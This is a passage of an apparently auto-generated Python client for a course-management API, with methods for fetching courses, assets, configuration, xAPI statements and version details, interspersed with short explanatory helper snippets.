# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
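    # Note the naming convention in the query_params handling above: snake_case
    # Python parameters map to camelCase API keys (include_registration_count ->
    # includeRegistrationCount, course_id -> courseId). A small sketch of that
    # mapping, purely for illustration (the generated code hardcodes each name
    # rather than converting at runtime):

```python
def to_camel(name):
    """Convert a snake_case parameter name to the camelCase key the API expects."""
    head, *rest = name.split("_")
    return head + "".join(part.capitalize() for part in rest)


camel_query_key = to_camel("include_registration_count")
camel_path_key = to_camel("course_id")
```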
def get_course_asset(self, course_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a Course # noqa: E501
Downloads the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_asset(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.get_course_asset_with_http_info(course_id, relative_path, **kwargs) # noqa: E501
return data
def get_course_asset_with_http_info(self, course_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a Course # noqa: E501
Downloads the asset file at the specified relative path from the latest version of the course. GetCourseFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_asset_with_http_info(course_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `get_course_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
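    # As the call above shows, course_id is substituted into the path template
    # while relative_path travels as a query parameter, so the two are encoded
    # differently. A sketch of how such a URL is assembled (the base URL and
    # helper name are hypothetical; the generated ApiClient does this
    # internally, and exact encoding details may differ):

```python
from urllib.parse import quote, urlencode


def build_asset_url(base, course_id, relative_path):
    # Path parameters are percent-encoded into the template; query parameters
    # are form-encoded by urlencode (space -> '+', '/' -> '%2F').
    path = "/courses/{courseId}/asset".format(courseId=quote(str(course_id), safe=""))
    return base + path + "?" + urlencode({"relativePath": relative_path})


url = build_asset_url("https://api.example.invalid/v2", "abc 1", "media/intro video.mp4")
```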
def get_course_configuration(self, course_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course # noqa: E501
Returns the effective configuration settings for the course. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_configuration(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_configuration_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_configuration_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_configuration_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course # noqa: E501
Returns the effective configuration settings for the course. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_configuration_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'include_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'include_metadata' in params:
query_params.append(('includeMetadata', params['include_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SettingListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
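    # The docstring above describes how effective settings are resolved: values
    # inherit from less specific levels (e.g. application) and are overridden by
    # more specific ones (e.g. course). A toy illustration of those semantics
    # only; the setting names below are made up and the server performs the real
    # merge:

```python
def effective_settings(*levels):
    """Merge configuration levels, least specific first; later levels win."""
    merged = {}
    for level in levels:  # e.g. (application, course)
        merged.update(level)
    return merged


application_level = {"LaunchType": "FRAMESET", "ResultsFormat": "FULL"}
course_level = {"LaunchType": "NEW_WINDOW"}  # overrides the application value
effective = effective_settings(application_level, course_level)
```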
def get_course_file_list(self, course_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course # noqa: E501
        Returns a list of asset files in the course. Each entry includes the relative path to use with the other course asset manipulation calls.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_file_list(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_file_list_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_file_list_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_file_list_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course # noqa: E501
        Returns a list of asset files in the course. Each entry includes the relative path to use with the other course asset manipulation calls.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_file_list_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_file_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_file_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_statements(self, course_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course # noqa: E501
Returns xAPI statements for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_statements(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
        :param str learner_id: Only entries for the specified learner ID will be included.
        :param datetime since: Only include entries at or after this ISO 8601 timestamp, inclusive (interpreted as UTC if no offset is given)
        :param datetime until: Only include entries at or before this ISO 8601 timestamp, inclusive (interpreted as UTC if no offset is given)
        :param str more: Pagination token returned as the `more` property of multi-page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_statements_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_statements_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_statements_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course # noqa: E501
Returns xAPI statements for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_statements_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
        :param str learner_id: Only entries for the specified learner ID will be included.
        :param datetime since: Only include entries at or after this ISO 8601 timestamp, inclusive (interpreted as UTC if no offset is given)
        :param datetime until: Only include entries at or before this ISO 8601 timestamp, inclusive (interpreted as UTC if no offset is given)
        :param str more: Pagination token returned as the `more` property of multi-page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'learner_id', 'since', 'until', 'more'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_statements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_statements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'learner_id' in params:
query_params.append(('learnerId', params['learner_id'])) # noqa: E501
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/xAPIStatements', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='XapiStatementResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
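    # Multi-page statement lists are drained by feeding each response's `more`
    # token back into the next call, as the `more` parameter above describes. A
    # self-contained sketch of that loop against a stubbed fetcher (the Page
    # stub mimics the `statements`/`more` shape of XapiStatementResult; names
    # are illustrative):

```python
def fetch_all_statements(fetch_page):
    """Collect every statement from a paginated feed; a falsy `more` ends it."""
    statements, more = [], None
    while True:
        page = fetch_page(more=more)
        statements.extend(page.statements)
        more = page.more
        if not more:
            return statements


class Page:
    def __init__(self, statements, more):
        self.statements, self.more = statements, more


# Two stub pages: the first returns a continuation token, the second does not.
pages = {None: Page([1, 2], "t1"), "t1": Page([3], None)}
all_statements = fetch_all_statements(lambda more: pages[more])
```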
def get_course_tags(self, course_id, **kwargs): # noqa: E501
"""Get tags for a Course # noqa: E501
Returns the tags for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_tags(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: TagListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_tags_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_tags_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_tags_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get tags for a Course # noqa: E501
Returns the tags for the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_tags_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:return: TagListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TagListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_asset(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a specific Course Version # noqa: E501
Downloads the asset file at the provided relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_asset(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_asset_with_http_info(course_id, version_id, relative_path, **kwargs) # noqa: E501
return data
def get_course_version_asset_with_http_info(self, course_id, version_id, relative_path, **kwargs): # noqa: E501
"""Download an asset file from a specific Course Version # noqa: E501
Downloads the asset file at the provided relative path from the course version. GetCourseVersionFileList can be used to find the relative path of the file. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_asset_with_http_info(course_id, version_id, relative_path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str relative_path: Relative path of the asset within the course. (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'relative_path'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_asset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_asset`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_asset`") # noqa: E501
# verify the required parameter 'relative_path' is set
if ('relative_path' not in params or
params['relative_path'] is None):
raise ValueError("Missing the required parameter `relative_path` when calling `get_course_version_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'relative_path' in params:
query_params.append(('relativePath', params['relative_path'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_configuration(self, course_id, version_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course Version # noqa: E501
Returns the effective configuration settings for the course version. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_configuration(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_configuration_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_configuration_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_configuration_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get effective configuration settings for a Course Version # noqa: E501
Returns the effective configuration settings for the course version. If not set at the course level, the setting will inherit a value from a higher level (e.g. application). If there is a configuration setting present at a more specific level, that setting will override the one set at the course level. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_configuration_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_metadata:
:return: SettingListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'include_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_configuration`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'include_metadata' in params:
query_params.append(('includeMetadata', params['include_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/configuration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SettingListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_file_list(self, course_id, version_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course Version # noqa: E501
        Returns a list of asset files in the course version. Each entry includes the relative path to use with the other course asset manipulation calls.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_file_list(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_file_list_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_file_list_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_file_list_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get a list of asset files in a Course Version # noqa: E501
        Returns a list of asset files in the course version. The list includes the relative path to use for the other course asset manipulation calls.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_file_list_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:return: FileListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_file_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_file_list`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_file_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FileListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
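# Every *_with_http_info method above opens with the same guard: collect
# kwargs, reject any keyword not in all_params, and build the effective
# parameter dict. The helper below is a standalone restatement of that
# pattern for illustration only -- validate_kwargs is not part of the
# generated client, and the method/parameter names in the usage line are
# taken from this file.
#
# ```python
# def validate_kwargs(method_name, all_params, kwargs):
#     """Reject unknown keyword arguments, mirroring the loop at the top
#     of each *_with_http_info method, and return the accepted params."""
#     params = {}
#     for key, val in kwargs.items():
#         if key not in all_params:
#             raise TypeError(
#                 "Got an unexpected keyword argument '%s'"
#                 " to method %s" % (key, method_name))
#         params[key] = val
#     return params
#
# ok = validate_kwargs('get_course_version_file_list',
#                      ['course_id', 'version_id', 'async_req'],
#                      {'async_req': True})
# ```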
def get_course_version_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get detailed information about a Course Version # noqa: E501
        Returns detailed information about the course version. This includes the update date and the registration count (if the corresponding optional parameters are passed in).  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_info_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_info_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_info_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get detailed information about a Course Version # noqa: E501
        Returns detailed information about the course version. This includes the update date and the registration count (if the corresponding optional parameters are passed in).  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_info_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_info" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_info`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
